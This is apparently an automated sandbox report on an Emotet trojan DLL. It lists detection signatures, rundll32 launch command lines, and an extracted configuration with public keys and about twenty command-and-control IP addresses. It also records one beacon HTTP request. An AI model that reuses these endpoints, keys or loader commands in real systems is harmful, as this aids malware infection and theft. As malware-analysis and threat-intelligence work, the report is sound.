Play interactive tour

Edit tour

Windows Analysis Report pYebrdRKvR

Overview

General Information

Sample Name:	pYebrdRKvR (renamed file extension from none to dll)
Analysis ID:	528005
MD5:	3102132775b47d2ff1c40a2b5293ba60
SHA1:	8d54c54e8eff10bf087236af120367620b61a622
SHA256:	5c4d9d71040604f2a6cd8fa3e69a3af1f79590348729cd0d90abbb8ea51a05a9
Tags:	32dllexetrojan
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Emotet RunDLL32 Process Creation

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

PE file contains an invalid checksum

PE file contains strange resources

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5848 cmdline: loaddll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 4828 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4624 cmdline: rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5808 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5116 cmdline: rundll32.exe C:\Users\user\Desktop\pYebrdRKvR.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4692 cmdline: rundll32.exe C:\Users\user\Desktop\pYebrdRKvR.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4248 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Olcnhkjrspgysi\kpevmak.bsr",xeRCFlLGA MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4316 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Olcnhkjrspgysi\kpevmak.bsr",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 3216 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5196 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6988 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6768 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.360524597.0000000000A76000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000003.361688769.0000000000A46000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.367502574.0000000003696000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.364197169.0000000000A3A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.362028571.0000000003516000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.362088501.0000000000A46000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.rundll32.exe.a46e78.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.d16c20.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.a76c68.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.3.rundll32.exe.a76c68.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.a76c68.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.3696cf0.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.3516cc0.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.3.rundll32.exe.a76c68.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.3516cc0.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.3.rundll32.exe.a46e78.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.d16c20.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.a46e78.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.3696cf0.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.3.rundll32.exe.d16c20.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 9 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Olcnhkjrspgysi\kpevmak.bsr",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Olcnhkjrspgysi\kpevmak.bsr",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Olcnhkjrspgysi\kpevmak.bsr",xeRCFlLGA, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4248, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Olcnhkjrspgysi\kpevmak.bsr",Control_RunDLL, ProcessId: 4316

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 5.3.rundll32.exe.a76c68.0.raw.unpack

Malware Configuration Extractor: Emotet {"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Multi AV Scanner detection for submitted file

Show sources

Source: pYebrdRKvR.dll	Virustotal: Detection: 18%			Perma Link
Source: pYebrdRKvR.dll	ReversingLabs: Detection: 17%

Machine Learning detection for sample

Show sources

Source: pYebrdRKvR.dll

Joe Sandbox ML: detected

Source: pYebrdRKvR.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.6:49761 version: TLS 1.2

Source: pYebrdRKvR.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F34188A FindFirstFileExW,	3_2_6F34188A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F34188A FindFirstFileExW,	4_2_6F34188A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10011A80 FindFirstFileW,	8_2_10011A80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.6:49761 -> 51.178.61.60:443
Source: Traffic	Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.6:49762 -> 168.197.250.14:80
Source: Traffic	Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.6:49763 -> 45.79.33.48:8080
Source: Traffic	Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.6:49767 -> 196.44.98.190:8080
Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.6:49774 -> 177.72.80.14:7080
Source: Traffic	Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 177.72.80.14:7080 -> 192.168.2.6:49774

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 196.44.98.190 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.79.33.48 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 168.197.250.14 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.178.61.60 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 177.72.80.14 168	Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 51.178.61.60:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 45.79.33.48:8080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 177.72.80.14:7080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: EcobandGH EcobandGH
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: global traffic

HTTP traffic detected: GET /wxXNBTtFVptEPyBMyhxzytUrLNSymmMWHdjZgweBcTxtKLUZGczVLXNxnireROs HTTP/1.1Cookie: JmIuwWBWPToZ=XDGTMkmFZ9hr0CeEgG7gEpD9hs4Omotho6+57napLIrRc+yLhr6jDd+kXDv4veMC3uDo48E0KYz8mat8uVA0WXuFnsw4hzFORPBn7MrucHVcn/hm73RFPQ0NYNqRr6rNpXumiYPSOimYLiR2Tu6sMdw82U3DBUuDHRe9h1WQb6f1GDhoy5QtZ0z4paXtdMAW8mO9u70ywe2JFmJ1lqhLDJPKOuQAbbEec0hu7deLYD9sE1A=Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 196.44.98.190 196.44.98.190

Source: global traffic	TCP traffic: 192.168.2.6:49763 -> 45.79.33.48:8080
Source: global traffic	TCP traffic: 192.168.2.6:49767 -> 196.44.98.190:8080
Source: global traffic	TCP traffic: 192.168.2.6:49774 -> 177.72.80.14:7080

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Nov 2021 15:55:38 GMTContent-Type: text/htmlContent-Length: 162Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 196.44.98.190
Source: unknown	TCP traffic detected without corresponding DNS query: 196.44.98.190
Source: unknown	TCP traffic detected without corresponding DNS query: 196.44.98.190
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14

Source: svchost.exe, 00000011.00000003.492760286.0000018F11B8E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 00000011.00000003.492760286.0000018F11B8E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 00000011.00000003.492779008.0000018F11B9F000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.492760286.0000018F11B8E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z\|\|.\|\|797d024d-8c74-4faa-b6a6-08435801478b\|\|1152921505694213184\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000011.00000003.492779008.0000018F11B9F000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.492760286.0000018F11B8E000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z\|\|.\|\|797d024d-8c74-4faa-b6a6-08435801478b\|\|1152921505694213184\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"

Source: rundll32.exe, 00000008.00000003.380789393.0000000000D79000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.508849113.0000018F112E5000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.864253406.000001AB1488A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000014.00000002.864253406.000001AB1488A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.8.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?986d1fe106f4f
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabi
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enw
Source: svchost.exe, 00000011.00000003.488879650.0000018F11B91000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.488742687.0000018F11B6F000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: rundll32.exe, 00000008.00000003.478850691.0000000000DB5000.00000004.00000001.sdmp	String found in binary or memory: http://www.microsoft.c
Source: rundll32.exe, 00000008.00000002.885044088.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.615433504.0000000000D6B000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.478842500.0000000000DA3000.00000004.00000001.sdmp	String found in binary or memory: https://168.197.250.14/khX
